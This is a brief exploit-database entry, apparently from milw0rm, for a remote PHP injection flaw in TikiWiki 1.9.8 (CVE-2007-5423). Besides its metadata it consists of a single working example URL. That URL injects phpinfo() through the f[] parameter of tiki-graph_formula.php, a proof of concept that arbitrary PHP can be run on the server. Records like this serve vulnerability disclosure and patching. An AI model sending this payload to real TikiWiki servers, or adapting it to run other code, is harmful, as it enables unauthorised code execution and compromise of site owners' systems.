TikiWiki 1.9.8 - Remote PHP Injection

CVE:

2007-5423

Status:

Verified

Author:

SHANKAR

Date:

2007-10-10





Example: http:/server/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=

milw0rm.com [2007-10-10]